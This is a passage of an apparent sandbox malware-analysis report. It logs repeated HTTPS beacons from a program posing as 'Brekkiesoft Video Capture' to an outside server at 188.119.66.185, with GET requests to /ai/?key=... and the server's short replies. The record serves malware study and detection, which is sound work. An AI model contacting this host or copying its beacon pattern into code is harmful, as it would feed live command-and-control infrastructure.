                                                                                                                                      Dec 18, 2024 14:00:49.476258039 CET49909443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:49.476278067 CET44349909188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:49.593157053 CET49915443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:49.593202114 CET44349915188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:49.593409061 CET49915443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:49.593547106 CET49915443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:49.593554974 CET44349915188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:51.173449993 CET44349915188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:51.173700094 CET49915443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:51.201005936 CET49915443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:51.201046944 CET44349915188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:51.205030918 CET49915443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:51.205039024 CET44349915188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:52.086252928 CET44349915188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:52.086308956 CET49915443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:52.086328030 CET44349915188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:52.086343050 CET44349915188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:52.086366892 CET49915443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:52.086385012 CET49915443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:52.086580038 CET49915443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:52.086595058 CET44349915188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:52.202841997 CET49922443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:52.202896118 CET44349922188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:52.202959061 CET49922443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:52.203277111 CET49922443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:52.203288078 CET44349922188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:53.662518024 CET44349922188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:53.662666082 CET49922443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:53.663209915 CET49922443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:53.663222075 CET44349922188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:53.663367987 CET49922443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:53.663373947 CET44349922188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:54.349215031 CET44349922188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:54.349272966 CET49922443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:54.349287033 CET44349922188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:54.349298000 CET44349922188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:54.349323988 CET49922443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:54.349348068 CET49922443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:54.349448919 CET49922443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:54.349462032 CET44349922188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:54.468415022 CET49928443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:54.468456030 CET44349928188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:54.468527079 CET49928443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:54.468780994 CET49928443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:54.468796015 CET44349928188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:56.041357994 CET44349928188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:56.041452885 CET49928443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:56.041902065 CET49928443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:56.041915894 CET44349928188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:56.042105913 CET49928443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:56.042114973 CET44349928188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:56.735733032 CET44349928188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:56.735819101 CET44349928188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:56.735846043 CET49928443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:56.735867023 CET49928443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:56.736093044 CET49928443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:56.736114025 CET44349928188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:56.844305038 CET49934443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:56.844346046 CET44349934188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:56.844428062 CET49934443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:56.844880104 CET49934443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:56.844908953 CET44349934188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:58.823016882 CET44349934188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:58.823131084 CET49934443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:58.823590040 CET49934443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:58.823596954 CET44349934188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:58.823714018 CET49934443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:58.823718071 CET44349934188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:59.849013090 CET44349934188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:59.849325895 CET44349934188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:59.849543095 CET49934443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:59.849714994 CET49934443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:59.849734068 CET44349934188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:59.968425035 CET49944443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:59.968466043 CET44349944188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:00:59.968837976 CET49944443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:59.969077110 CET49944443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:00:59.969089031 CET44349944188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:01:01.592046022 CET44349944188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:01:01.592108011 CET49944443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:01:01.592550039 CET49944443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:01:01.592555046 CET44349944188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:01:01.592715979 CET49944443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:01:01.592720032 CET44349944188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:01:02.555613041 CET44349944188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:01:02.555721045 CET44349944188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:01:02.555840969 CET49944443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:01:02.556169033 CET49944443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:01:02.556184053 CET44349944188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:01:02.672097921 CET49950443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:01:02.672163963 CET44349950188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:01:02.672236919 CET49950443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:01:02.672653913 CET49950443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:01:02.672669888 CET44349950188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:01:04.322603941 CET44349950188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:01:04.322674036 CET49950443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:01:04.323219061 CET49950443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:01:04.323229074 CET44349950188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:01:04.325366020 CET49950443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:01:04.325371981 CET44349950188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:01:05.207411051 CET44349950188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:01:05.207484007 CET49950443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:01:05.207488060 CET44349950188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:01:05.207659960 CET49950443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:01:05.207791090 CET49950443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:01:05.207807064 CET44349950188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:01:05.329994917 CET49956443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:01:05.330068111 CET44349956188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:01:05.330245972 CET49956443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:01:05.330440044 CET49956443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:01:05.330452919 CET44349956188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:01:07.307466984 CET44349956188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:01:07.308660030 CET49956443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:01:07.309324980 CET49956443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:01:07.309331894 CET44349956188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:01:07.311674118 CET49956443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:01:07.311680079 CET44349956188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:01:08.431828976 CET44349956188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:01:08.431910992 CET49956443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:01:08.431911945 CET44349956188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:01:08.431992054 CET49956443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:01:08.432213068 CET49956443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:01:08.432233095 CET44349956188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:01:08.548495054 CET49967443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:01:08.548535109 CET44349967188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:01:08.548629999 CET49967443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:01:08.548872948 CET49967443192.168.2.7188.119.66.185
                                                                                                                                      Dec 18, 2024 14:01:08.548890114 CET44349967188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:01:10.190359116 CET44349967188.119.66.185192.168.2.7
                                                                                                                                      Dec 18, 2024 14:01:10.190419912 CET49967443192.168.2.7188.119.66.185
                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                      Dec 18, 2024 13:59:10.554888964 CET6434353192.168.2.71.1.1.1
                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                      Dec 18, 2024 13:59:10.554888964 CET192.168.2.71.1.1.10x3786Standard query (0)time.windows.comA (IP address)IN (0x0001)false
                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                      Dec 18, 2024 13:59:10.694653034 CET1.1.1.1192.168.2.70x3786No error (0)time.windows.comtwc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                      • 188.119.66.185
                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      0192.168.2.749795188.119.66.1854437528C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-18 13:00:02 UTC283OUTGET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                      Host: 188.119.66.185
                                                                                                                                      2024-12-18 13:00:03 UTC200INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                      Date: Wed, 18 Dec 2024 13:00:03 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      X-Powered-By: PHP/7.4.33
                                                                                                                                      2024-12-18 13:00:03 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: e8b723663ec13250


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      1192.168.2.749804188.119.66.1854437528C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-18 13:00:05 UTC283OUTGET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                      Host: 188.119.66.185
                                                                                                                                      2024-12-18 13:00:06 UTC200INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                      Date: Wed, 18 Dec 2024 13:00:06 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      X-Powered-By: PHP/7.4.33
                                                                                                                                      2024-12-18 13:00:06 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: e8b723663ec13250


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      2192.168.2.749813188.119.66.1854437528C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-18 13:00:08 UTC283OUTGET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                      Host: 188.119.66.185
                                                                                                                                      2024-12-18 13:00:09 UTC200INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                      Date: Wed, 18 Dec 2024 13:00:09 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      X-Powered-By: PHP/7.4.33
                                                                                                                                      2024-12-18 13:00:09 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: e8b723663ec13250


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      3192.168.2.749819188.119.66.1854437528C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-18 13:00:11 UTC283OUTGET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                      Host: 188.119.66.185
                                                                                                                                      2024-12-18 13:00:11 UTC200INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                      Date: Wed, 18 Dec 2024 13:00:11 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      X-Powered-By: PHP/7.4.33
                                                                                                                                      2024-12-18 13:00:11 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: e8b723663ec13250


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      4192.168.2.749824188.119.66.1854437528C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-18 13:00:13 UTC283OUTGET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                      Host: 188.119.66.185
                                                                                                                                      2024-12-18 13:00:14 UTC200INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                      Date: Wed, 18 Dec 2024 13:00:14 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      X-Powered-By: PHP/7.4.33
                                                                                                                                      2024-12-18 13:00:14 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: e8b723663ec13250


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      5192.168.2.749832188.119.66.1854437528C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-18 13:00:16 UTC283OUTGET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                      Host: 188.119.66.185
                                                                                                                                      2024-12-18 13:00:17 UTC200INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                      Date: Wed, 18 Dec 2024 13:00:17 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      X-Powered-By: PHP/7.4.33
                                                                                                                                      2024-12-18 13:00:17 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: e8b723663ec13250


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      6192.168.2.749838188.119.66.1854437528C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-18 13:00:19 UTC283OUTGET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                      Host: 188.119.66.185
                                                                                                                                      2024-12-18 13:00:19 UTC200INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                      Date: Wed, 18 Dec 2024 13:00:19 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      X-Powered-By: PHP/7.4.33
                                                                                                                                      2024-12-18 13:00:19 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: e8b723663ec13250


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      7192.168.2.749843188.119.66.1854437528C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-18 13:00:21 UTC283OUTGET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                      Host: 188.119.66.185
                                                                                                                                      2024-12-18 13:00:22 UTC200INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                      Date: Wed, 18 Dec 2024 13:00:22 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      X-Powered-By: PHP/7.4.33
                                                                                                                                      2024-12-18 13:00:22 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: e8b723663ec13250


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      8192.168.2.749848188.119.66.1854437528C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-18 13:00:24 UTC283OUTGET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                      Host: 188.119.66.185
                                                                                                                                      2024-12-18 13:00:25 UTC200INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                      Date: Wed, 18 Dec 2024 13:00:25 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      X-Powered-By: PHP/7.4.33
                                                                                                                                      2024-12-18 13:00:25 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: e8b723663ec13250


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      9192.168.2.749853188.119.66.1854437528C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-18 13:00:26 UTC283OUTGET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                      Host: 188.119.66.185
                                                                                                                                      2024-12-18 13:00:27 UTC200INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                      Date: Wed, 18 Dec 2024 13:00:27 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      X-Powered-By: PHP/7.4.33
                                                                                                                                      2024-12-18 13:00:27 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: e8b723663ec13250


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      10192.168.2.749860188.119.66.1854437528C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-18 13:00:29 UTC283OUTGET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                      Host: 188.119.66.185
                                                                                                                                      2024-12-18 13:00:30 UTC200INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                      Date: Wed, 18 Dec 2024 13:00:30 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      X-Powered-By: PHP/7.4.33
                                                                                                                                      2024-12-18 13:00:30 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: e8b723663ec13250


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      11192.168.2.749868188.119.66.1854437528C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-18 13:00:32 UTC283OUTGET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                      Host: 188.119.66.185
                                                                                                                                      2024-12-18 13:00:34 UTC200INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                      Date: Wed, 18 Dec 2024 13:00:33 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      X-Powered-By: PHP/7.4.33
                                                                                                                                      2024-12-18 13:00:34 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: e8b723663ec13250


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
